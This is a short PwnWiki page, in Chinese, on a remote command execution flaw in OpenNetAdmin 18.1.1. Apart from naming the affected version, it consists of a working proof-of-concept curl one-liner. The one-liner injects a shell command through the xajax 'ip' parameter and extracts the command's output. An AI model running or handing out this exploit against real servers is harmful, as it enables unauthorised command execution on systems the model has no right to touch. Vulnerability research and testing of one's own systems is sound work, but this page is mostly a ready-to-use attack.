OpenNetAdmin 18.1.1 遠程命令執行

From PwnWiki
Revision as of 14:30, 22 April 2021 by Atsud0 (talk | contribs) (Created page with "== 影響版本: == OpenNetAdmin 18.1.1 == POC: == <pre> cmd=whoami;URL=http://1.1.1.1/www/;curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=toolti...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本:

OpenNetAdmin 18.1.1


POC:

cmd=whoami;URL=http://1.1.1.1/www/;curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

Exploit Analysis - OpenNetAdmin 18.1.1 RCE